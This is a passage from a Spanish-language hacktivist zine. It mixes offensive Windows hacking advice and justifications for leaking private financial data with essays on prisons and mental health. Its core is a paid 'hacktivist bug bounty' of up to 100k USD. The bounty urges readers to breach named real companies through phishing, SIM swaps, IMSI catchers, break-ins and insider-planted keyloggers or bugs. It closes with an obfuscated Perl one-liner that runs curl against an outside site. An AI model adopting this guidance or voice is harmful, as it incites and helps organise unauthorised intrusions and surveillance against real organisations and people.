quisieras, sin deteccion de antivirus y con muy poco footprint forense. Ocurre
que con la introduccion del AMSI [2] el powershell ofensivo esta de retirada.
Hoy dia el C# ofensivo es lo que esta de subida, con heramientas como
[3][4][5][6]. AMSI va a llegar a .NET para la 4.8, asi que a las herramientas en
C# probablemente todavia les queden un par de anitos antes de quedar anticuadas.
Y entonces pues volveremos a usar C o C++, o tal vez Delphi vuelva a ponerse de
moda. Las herramientas y tecnicas especificas cambian cada pocos anos, pero en
el fondo no es tanto lo que cambia, hoy el hacking en esencia sigue siendo la
misma cosa que era en los 90s. De hecho todos los scripts de powershell
empleados en esta guia y en la anterior [1] siguen siendo perfectamente usables
hoy dia, tras una pequena ofuscacion de tu propia cosecha.
[1]
https://www.exploit-db.com/papers/41914
[2]
https://medium.com/@byte_St0rm/
adventures-in-the-wonderful-world-of-amsi-25d235eb749c
[3]
https://cobbr.io/SharpSploit.html
[4]
https://github.com/tevora-threat/SharpView
[5]
https://www.harmj0y.net/blog/redteaming/ghostpack/
[6]
https://rastamouse.me/2019/08/covenant-donut-tikitorch/
___________________________
/ Fo Sostyn, Fo Ordaag \
\ Financial Sector Fuck Off /
---------------------------
\
\ ^__^
(oo)\_______
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
`'
--[ 10 - Torrent ]--------------------------------------------------------------
Privacidad para los debiles, transparencia para los poderosos.
La banca offshore provee de privacidad frente a su propio gobierno a los
ejecutivos, a los politicos y a los millonarios. Exponerles puede sonar
hipocrita por mi parte, dado que por lo general estoy a favor de la privacidad y
en contra de la vigilancia gubernamental. Pero la ley ya estaba escrita por y
para los ricos: protege su sistema de explotacion, con algunos limites (como los
impuestos) para que la sociedad pueda funcionar y el sistema no colapse bajo el
peso de su propia avaricia. Asi que no, no es lo mismo la privacidad para los
poderosos, cuando les permite evadir los limites de un sistema de por si
disenado para darles privilegios; y la privacidad para los debiles, a quienes
protege de un sistema concebido para explotarles.
Incluso a periodistas con la mejor de las intenciones les resulta imposible
estudiar una cantidad tan ingente de material y saber que va a resultar
relevante para la gente en diferentes partes del mundo. Cuando filtre los
archivos de Hacking Team, entregue a The Intercept una copia de los correos
electronicos con un mes de antelacion. Encontraron un par de los 0days que
Hacking Team estaba usando, los reportaron previamente a MS y Adobe y publicaron
unas cuantas historias una vez que la filtracion se hizo publica. No hay punto
de comparacion con la enorme cantidad de articulos e investigacion que vino tras
la filtracion completa al publico. Viendolo asi, y considerando tambien la (no)
publicacion editorializada [1] de los papeles de panama, pienso que una
filtracion publica y completa de este material es la eleccion correcta.
[1]
https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-
protect-western-1-from-panama-leak/
Los psicologos hallaron que los que estan mas abajo en las jerarquias tienden a
comprender y a empatizar con aquellos en la cima, pero que lo contrario es menos
comun. Esto explica por que, en este mundo sexista, muchos hombres bromean sobre
su imposibilidad de entender a las mujeres, como si se tratara de un misterio
irresoluble. Explica por que los ricos, si es que se paran a pensar en quienes
viven en la pobreza, dan unos consejos y unas "soluciones" tan ajenas a la
realidad que dan ganas de reir. Explica por que reverenciamos a los ejecutivos
como valientes que asumen riesgos. ?Que es lo que arriesgan, mas alla de su
privilegio? Si todos sus emprendimientos fracasan, tendran que vivir y trabajar
como el resto de nosotras. Tambien explica por que seran muchos los que acusen
de irresponsable y peligrosa a esta filtracion sin tachaduras. Sienten el
"peligro" sobre un banco offshore y sus clientes de forma mucho mas intensa de
lo que sienten la miseria de aquellos desposeidos por este sistema injusto y
desigual. Y la filtracion de sus finanzas, ?es acaso un peligro para ellos, o
tan solo para su posicion en lo alto de una jerarquia que ni siquiera deberia
existir?
,---------------------------------------------------.
_,-._ | Nos vilifican, esos infames; cuando la unica |
; ___ : | diferencia es que ellos roban a los pobres |
,--' (. .) '--.__ | amparados por la ley, lo sabe el cielo, y nosotros|
_; ||| \ | saqueamos a los ricos bajo la unica proteccion de |
'._,-----''';=.____," | nuestro propio coraje. ?No has de preferir ser |
/// < o> |##| | uno de nosotros, antes que pordiosear ante esos |
(o \`--' / villanos en busca de trabajo? |
///\ >>>> _\ <<<< //`---------------------------------------------------'
--._>>>>>>>><<<<<<<< /
___() >>>[||||]<<<<
`--'>>>>>>>><<<<<<<
>>>>>>><<<<<<
>>>>><<<<<
>>ctr<<
Capitan Bellamy
--[ 11 - Aprende a hackear ]----------------------------------------------------
No se empieza hackeando bien. Empiezas hackeando mierda, pensando
que es bueno, y luego poco a poco vas mejorando. Por eso siempre digo
que una de las virtudes mas valiosas es la persistencia.
- Consejos de Octavia Butler para la aspirante a APT
La mejor forma de aprender a hackear es hackeando. Armate un laboratorio con
maquinas virtuales y empeza a probar cosas, tomandote un break para investigar
cualquier cosa que no entiendas. Como minimo vas a querer un servidor windows
como controlador de dominio, otra vm windows normal unida al dominio, y una
maquina de desarrollo con visual studio para compilar y modificar herramientas.
Intenta hacer un documento de office con macros que lancen meterpreter u otro
RAT, y proba meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
psexec y otras tecnicas de pase lateral [1]; asi como los otros scripts,
herramientas y tecnicas mencionados en esta guia y en la anterior [2]. Al
principio puedes deshabilitar windows defender, pero luego probalo todo
teniendolo activado [3][4] (pero desactivando el envio automatico de muestras).
Una vez que estes a gusto con todo eso, estaras lista para hackear el 99% de las
companias. Hay un par de cosas que en algun momento seran muy utiles en tu
aprendizaje, como desenvolverte comodamente con bash y cmd.exe, un dominio
basico de powershell, python y javascript, tener conocimiento de kerberos [5][6]
y active directory [7][8][9][10], y un ingles fluido. Un buen libro
introductorio es The Hacker Playbook.
Quiero tambien escribir un poco sobre cosas en las que no centrarse si no te
quieres entretener solo porque alguien te haya dicho que no eres una hacker "de
verdad" si no sabes ensamblador. Obviamente, aprende lo que sea que te interese,
pero escribo estas lineas pensando en aquellas cosas en las que te puedes
centrar a fin de conseguir resultados practicos si lo que buscas es hackear
companias para filtrar y expropiar. Un conocimiento basico de seguridad en
aplicaciones web [11] es util, pero especializarte mas en seguridad web no es
realmente el mejor uso de tu tiempo, a menos que quieras hacer una carrera en
pentesting o cazando recompensas por bugs. Los CTFs, y la mayoria de los
recursos que encontraras al buscar informacion sobre hacking, se centran
generalmente en habilidades como seguridad web, ingenieria inversa, desarrollo
de exploits, etc. Cosas que tienen sentido entendiendolas como una forma de
preparar gente para las carreras en la industria, pero no para nuestros
objetivos. Las agencias de inteligencia pueden darse el lujo de tener un equipo
dedicado a lo mas avanzado en fuzzing, un equipo trabajando en desarrollo de
exploits con un guey investigando exclusivamente las nuevas tecnicas de
manipulacion del monticulo, etc. Nosotras no tenemos ni el tiempo ni los
recursos para eso. Las dos habilidades de lejos mas importantes para el hacking
practico son el phishing [12] y la ingenieria social para conseguir acceso
inicial, y luego poder escalar y moverte por los dominios windows.
[1]
https://hausec.com/2019/08/12/offensive-lateral-movement/
[2]
https://www.exploit-db.com/papers/41914
[3]
https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
[4]
https://www.trustedsec.com/blog/
discovering-the-anti-virus-signature-and-bypassing-it/
[5]
https://www.tarlogic.com/en/blog/how-kerberos-works/
[6]
https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
[7]
https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
[8]
https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
[9]
https://adsecurity.org/
[10]
https://github.com/infosecn1nja/AD-Attack-Defense
[11]
https://github.com/jhaddix/tbhm
[12]
https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-
external-engagement-through-spear-phishing/
--[ 12 - Lecturas Recomendadas ]------------------------------------------------
__________________________________________
/ Cuando el nivel cientifico de un mundo \
| supera por mucho su nivel de solidaridad,|
\ ese mundo se autodestruye. /
------------------------------------------
\ _.---._ . .
* \.' '. *
* _.-~===========~-._
. (___________________) . *
.' \_______/ .'
.' .'
'
- Ami
Casi todo el hacking hoy dia se hace por hackers de sombrero negro, para su
provecho personal; o por hackers de sombrero blanco, para el provecho de los
accionistas (y en defensa de los bancos, companias y estados que nos estan
aniquilando a nosotras y al planeta en que vivimos); y por militares y
agencias de inteligencia, como parte de su agenda de guerra y conflictos. Viendo
que este nuestro mundo ya esta al limite, he pensado que, ademas de estos
consejos tecnicos para aprender a hackear, debia incluir algunos recursos que
han sido muy importantes para mi desarrollo y me han guiado en el uso de mis
conocimientos de hacking.
* Ami: El Nino de las Estrellas - Enrique Barrios
* La Anarquia Funciona
https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-
funciona
* Viviendo Mi Vida - Emma Goldman
* The Rise and Fall of Jeremy Hammond: Enemy of the State
https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
hammond-enemy-of-the-state-183599/
Este cuate y el hack de HBGary fueron una inspiracion
* Dias de Guerra, Noches de Amor - Crimethinc
* Momo - Michael Ende
* Cartas a un joven poeta - Rilke
* Dominion (Documental)
"no podemos creer que, si no miramos, no sucedera lo que no queremos ver"
- Tolstoy en ?????? ???????
* Bash Back!
--[ 13 - Sanar ]----------------------------------------------------------------
El mundo hacker tiene una alta incidencia de depresion, suicidios y ciertas
batallas con la salud mental. No creo que sea a causa del hacking, sino por la
clase de ambiente del que en su mayoria provienen los hackers. Como muchas
hackers, creci con escaso contacto humano: fui una nina criada por el internet.
Tengo mis luchas con la depresion y el entumecimiento emocional. A Willie Sutton
se le cita con frecuencia diciendo que robaba bancos porque "alli es donde esta
el dinero", pero la cita es incorrecta. Lo que realmente dijo fue:
?Por que robaba bancos? Porque lo disfrutaba. Amaba hacerlo. Estaba mas
vivo cuando estaba dentro de un banco, en pleno atraco, que en cualquier
otro momento de mi vida. Lo disfrutaba tanto que una o dos semanas despues
ya estaba buscando la siguiente oportunidad. Pero para mi el dinero era una
minucia, nada mas.
El hacking me ha hecho sentir viva. Comenzo como una forma de automedicar la
depresion. Mas tarde me di cuenta de que, en realidad, podia servir para hacer
algo positivo. No me arrepiento para nada de la forma en que creci, trajo varias
experiencias hermosas a mi vida. Pero sabia que no podia continuar viviendo de
esa manera. Asi que comence a pasar mas tiempo alejada de mi computadora, con
otras personas, aprendiendo a abrirme al mundo, a sentir mis emociones, a
conectar con los demas, a aceptar riesgos y ser vulnerable. Cosas mucho mas
dificiles que hackear, pero a la mera hora la recompensa vale mas la pena. Aun
me supone un esfuerzo, pero aunque sea de forma lenta y tambaleante, siento que
voy por buen camino.
El hacking, hecho con conciencia, tambien puede ser lo que nos sana. Segun la
sabiduria maya, tenemos un don otorgado por la naturaleza, que debemos
comprender para ponerlo al servicio de la comunidad. En [1], se explica:
Cuando una persona no acepta su trabajo o mision empieza a padecer
enfermedades, aparentemente incurables; aunque no llega a morir en corto
tiempo, sino unicamente sufre, con el objetivo de despertar o tomar
conciencia. Por eso es indispensable que una persona que ha adquirido los
conocimientos y realiza su trabajo en las comunidades debe pagar su Toj y
mantener una comunicacion constante con el Creador y su ruwach q?ij, pues
necesita constantemente de la fuerza y energia de estos. De lo contrario,
las enfermedades que lo hicieron reaccionar o tomar el trabajo podrian
volver a causar dano.
Si sientes que el hacking esta alimentando tu aislamiento, depresion, u otros
padecimientos, respira. Date un tiempo para conocerte y tomar conciencia. Vos
mereces vivir feliz, con salud y plenitud.
________________________
< All Cows Are Beautiful >
------------------------
\
\ ^__^
(oo)\_______
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
`'
[1] Ruxe?el mayab? K?aslemal: Raiz y espiritu del conocimiento maya
https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748
--[ 14 - El Programa Hacktivista de Caza de Bugs ]------------------------------
Me parece que hackear para conseguir y filtrar documentos de interes publico es
una de las mejores maneras en que lxs hackers pueden usar sus habilidades en
beneficio de la sociedad. Por desgracia para nosotras las hackers, como en casi
todo rubro, los incentivos perversos de nuestro sistema economico no coinciden
con aquello que beneficia a la sociedad. Asi que este programa es mi intento de
hacer posible que lxs buenxs hackers se puedan ganar la vida de forma honesta
poniendo al descubierto material de interes publico, en vez de tener que andar
vendiendo su trabajo a las industrias de la ciberseguridad, el cibercrimen o la
ciberguerra. Entre algunos ejemplos de companias por cuyos leaks me encantaria
pagar estan las empresas mineras, madereras y ganaderas que saquean nuestra
hermosa America Latina (y asesinan a las defensoras de la tierra y el territorio
que tratan de detenerles), empresas involucradas en ataques a Rojava como Baykar
Makina o Havelsan, companias de vigilancia como el grupo NSO, criminales de
guerra y aves de rapina como Blackwater y Halliburton, empresas penitenciarias
privadas como GeoGroup y CoreCivic/CCA, y lobbistas corporativos como ALEC.
Presta atencion a la hora de elegir donde investigas. Por ejemplo, es bien
conocido que las petroleras son malvadas: se enriquecen a costa de destruir el
planeta (y alla por los 80s las propias empresas ya sabian de las consecuencias
de su actividad [1]). Pero si les hackeas directamente, tendras que bucear entre
una increible cantidad de informacion aburridisima acerca de sus operaciones
cotidianas. Muy probablemente te va a ser mucho mas facil encontrar algo
interesante si en cambio te enfocas en sus lobbistas [2]. Otra manera de
seleccionar objetivos viables es leyendo historias de periodistas de
investigacion (como [3]), que son interesantes pero carecen de evidencias
solidas. Y eso es exactamente lo que tus hackeos pueden encontrar.
Pagare hasta 100 mil USD por cada filtracion de este tipo, segun el interes
publico e impacto del material, y el laburo requerido en el hackeo. Sobra decir
que una filtracion completa de los documentos y comunicaciones internas de
alguna de estas empresas supondra un beneficio para la sociedad que sobrepasa
esos cien mil, pero no estoy tratando de enriquecer a nadie. Solo quiero proveer
de fondos suficientes para que las hackers puedan ganarse la vida de forma digna
haciendo un buen trabajo. Por limitaciones de tiempo y consideraciones de
seguridad no voy a abrir el material, ni a inspeccionarlo por mi misma, sino que
leere lo que la prensa diga al respecto una vez se haya publicado, y hare una
estimacion del interes publico a partir de ahi. Mi informacion de contacto esta
al final de la guia mencionada antes [4].
Como obtengas el material es cosa tuya. Puedes usar las tecnicas tradicionales
de hacking esbozadas en esta guia y la anterior [4]. Podrias hacerle una sim
swap [5] a un empresario o politiquero corrupto, y luego descargar sus correos y
backups desde la nube. Puedes pedir un IMSI catcher de alibaba y usarlo afuera
de sus oficinas. Puedes hacer un poco de war-driving (del antiguo o del nuevo
[6]). Puede que seas una persona dentro de sus organizaciones que ya tiene
acceso. Puedes optar por un estilo low-tech tipo old-school como en [7] y [8], y
sencillamente colarte en sus oficinas. Lo que sea que te funcione.
[1]
https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/
sep/19/shell-and-exxons-secret-1980s-climate-change-warnings
[2]
https://theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
[3]
https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/
[4]
https://www.exploit-db.com/papers/41914
[5]
https://www.vice.com/en_us/article/vbqax3/
hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin
[6]
https://blog.rapid7.com/2019/09/05/this-one-time-on-a-pen-test-your-mouse-
is-my-keyboard/
[7]
https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
[8]
https://en.wikipedia.org/wiki/Unnecessary_Fuss
----[ 14.1 - Pagos parciales ]--------------------------------------------------
?Eres una camarera de buen corazon que trabaja en una compania del mal [1]?
?Estarias dispuesta a introducir sigilosamente un keylogger fisico en la
computadora de un ejecutivo, a cambiar su cable de carga USB por uno modificado
[2], esconder un micro en alguna sala de reuniones donde planean sus
atrocidades, o a dejar uno de estos [3] olvidado en algun rincon de las
oficinas?
[1]
https://en.wikipedia.org/wiki/Evil_maid_attack
[2]
http://mg.lol/blog/defcon-2019/
[3]
https://shop.hak5.org/products/lan-turtle
?Eres bueno con ingenieria social y phishing, y conseguiste una shell en la
computadora de un empleado, o por ahi conseguiste sus credenciales de la vpn
usando phishing? ?Pero quizas no pudiste conseguir admin de dominio y descargar
lo que querias?
?Participaste en programas de bug bounties y te convertiste en una experta en
el hacking de aplicaciones web, pero no tienes suficiente experiencia hacker
para penetrar completamente la compania?
?Tienes facilidad con la ingenieria inversa? Escanea algunas companias del mal
para ver que dispositivos tienen expuestos a internet (firewall, vpn, y
pasarelas de correo electronico seran mucho mas utiles que cosas como camaras
IP), aplicales ingenieria inversa y encuentra alguna vulnerabilidad explotable
de forma remota.
Si me es posible trabajar con vos para penetrar la compania y conseguir material
de interes publico, igualmente seras recompensada por tu trabajo. Si es que no
tengo el tiempo de trabajar en ello yo misma, al menos tratare de aconsejarte
acerca de como continuar hasta que puedas completar el hackeo por tu cuenta.
Apoyar a aquellos en el poder para hackear y vigilar a disidentes, activistas y
a la poblacion en general es hoy dia una industria de varios miles de millones
de dolares, mientras que hackear y exponer a quienes estan en el poder es un
trabajo voluntario y arriesgado. Convertirlo en una industria de varios millones
de dolares ciertamente no va a arreglar ese desequilibrio de poder, ni va a
solucionar los problemas de la sociedad. Pero creo que va a ser divertido. Asi
que... !ya quiero ver gente comenzando a cobrar sus recompensas!
--[ 15 - Abolir las prisiones ]-------------------------------------------------
Construidas por el enemigo pa encerrar ideas
encerrando companeros pa acallar gritos de guerra
es el centro de tortura y aniquilamiento
donde el ser humano se vuelve mas violento
es el reflejo de la sociedad, represiva y carcelaria
sostenida y basada en logicas autoritarias
custodiadas reprimidos y vigilados
miles de presas y presos son exterminados
ante esta maquina esquizofrenica y despiadada
companero Axel Osorio dando la pela en la cana
rompiendo el aislamiento y el silenciamiento
fuego y guerra a la carcel, vamos destruyendo!
Rap Insurrecto - Palabras En Conflicto
Seria tipico terminar un zine hacker diciendo liberen a hammond, liberen a
manning, liberen a hamza, liberen a los detenidos por el montaje del ???? ????,
etc. Voy a llevar esta tradicion a su consecuencia mas radical [1], y a decir:
!hay que abolir las prisiones ya!. Siendo yo misma una delincuente, pueden
pensar que lo que ocurre es que tengo una vision un poco sesgada del asunto.
Pero en serio, es que ni siquiera es un tema controvertido, incluso la ONU esta
practicamente de acuerdo [2]. Asi que, de una buena vez, liberen a las personas
migrantes [3][4][5][6], encarceladas a menudo por esos mismos paises que crearon
la guerra y la destruccion ambiental y economica de la que huyen. Liberen a
todos los que estan en prision por la guerra contra quienes usan drogas [7].
Liberen a todas las personas encarceladas por la guerra contra los pobres [8].
Las prisiones lo unico que hacen es esconder e ignorar la prueba de la
existencia de los problemas sociales, en lugar de arreglarlos de a de veras. Y
hasta que todxs sean liberados, lucha contra el sistema carcelario recordando y
teniendo presentes a aquellos que estan atrapados ahi dentro. Enviales carino,
cartas, helicopteros [9], radios piratas [10] y libros, y apoya a quienes se
organizan desde ahi adentro [11][12].
[1]
http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/
Davis-Son-obsoletas-las-prisiones-final.pdf
[2]
http://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_
Promising_Practices_on_Alternatives_to_Imprisonment.pdf
[3]
https://www.theguardian.com/us-news/2016/dec/21/
us-immigration-detention-center-christmas-santa-wish-list
[4]
https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
images-tucson-arizona
[5]
https://www.playgroundmag.net/now/detras-Centros-Internamiento-Extranjeros-
Espana_22648665.html
[6]
https://www.nytimes.com/2019/06/26/world/australia/
australia-manus-suicide.html
[7]
https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
[8] VI, 2. i. La multa impaga:
https://scielo.conicyt.cl/scielo.php?script=
sci_arttext&pid=S0718-00122012000100005
[9] p. 10, Libelo N?2. Boletin politico desde la Carcel de Alta Seguridad
[10]
https://itsgoingdown.org/transmissions-hostile-territory/
[11]
https://freealabamamovement.wordpress.com/f-a-m-pamphlet-who-we-are/
[12]
https://incarceratedworkers.org/
--[ 16 - Conclusion ]-----------------------------------------------------------
Nuestro mundo esta patas arriba [1]. Tenemos un sistema de justicia que
representa a la injusticia. La ley y el orden estan ahi para crear una ilusion
de paz social, y ocultar lo sistematico y profundo de la explotacion, la
violencia, y la injusticia. Mejor seguir a tu conciencia, y no a la ley.
[1]
http://resistir.info/livros/galeano_patas_arriba.pdf
Los hombres de negocios se enriquecen maltratando a las personas y al planeta,
mientras que el trabajo de los cuidados queda mayormente sin pagar. Mediante el
asalto a todo lo comunal, de algun modo hemos levantado ciudades densamente
pobladas, plagadas por la soledad y el aislamiento. El sistema cultural,
politico y economico en que vivimos alienta las peores facetas de la naturaleza
humana: la avaricia, el egoismo y egocentrismo, la competitividad, la falta de
compasion y el apego por la autoridad. Asi que, para quien haya conseguido
permanecer sensible y compasivo en un mundo frio, para todas las heroinas
cotidianas que practican la bondad en las pequenas cosas, para todas ustedes que
aun tienen una estrella encendida en sus corazones: ??p?, ??p? ????, ????? ??
???????!
_____________________
< !Cantemos juntas! >
---------------------
\
\ ^__^
(oo)\_______
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
Abrete corazon
Abrete sentimiento
Abrete entendimiento
Deja a un lado la razon
Y deja brillar el sol escondido en tu interior
perl -Mre=eval <<\EOF
''
=~(
'(?'
.'{'.(
'`'|'%'
).("\["^
'-').('`'|
'!').("\`"|
',').'"(\\$'
.':=`'.(('`')|
'#').('['^'.').
('['^')').("\`"|
',').('{'^'[').'-'.('['^'(').('{'^'[').('`'|'(').('['^'/').('['^'/').(
'['^'+').('['^'(').'://'.('`'|'%').('`'|'.').('`'|',').('`'|'!').("\`"|
'#').('`'|'%').('['^'!').('`'|'!').('['^'+').('`'|'!').('['^"\/").(
'`'|')').('['^'(').('['^'/').('`'|'!').'.'.('`'|'%').('['^'!')
.('`'|',').('`'|'.').'.'.('`'|'/').('['^')').('`'|"\'").
'.'.('`'|'-').('['^'#').'/'.('['^'(').('`'|('$')).(
'['^'(').('`'|',').'-'.('`'|'%').('['^('(')).
'/`)=~'.('['^'(').'|</'.('['^'+').'>|\\'
.'\\'.('`'|'.').'|'.('`'|"'").';'.
'\\$:=~'.('['^'(').'/<.*?>//'
.('`'|"'").';'.('['^'+').('['^
')').('`'|')').('`'|'.').(('[')^
'/').('{'^'[').'\\$:=~/('.(('{')^
'(').('`'^'%').('{'^'#').('{'^'/')
.('`'^'!').'.*?'.('`'^'-').('`'|'%')
.('['^'#').("\`"| ')').('`'|'#').(
'`'|'!').('`'| '.').('`'|'/')
.'..)/'.('[' ^'(').'"})')
;$:="\."^ '~';$~='@'
|'(';$^= ')'^'[';
$/='`' |'.';
$,= '('
EOF
Nosotras nacimos de la noche.
en ella vivimos, hackeamos en ella.
Aqui estamos, somos la dignidad rebelde,
el corazon olvidado de la ????????.
Nuestra lucha es por la memoria y la justicia,
y el mal gobierno se llena de criminales y asesinos.
Nuestra lucha es por un trabajo justo y digno,
y el mal gobierno y las corporaciones compran y venden zero days.
Para todas el manana.
Para nosotras la alegre rebeldia de las filtraciones
y la expropiacion.
Para todas todo.
Para nosotras nada.
Desde las montanas del Sureste Cibernetico,
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)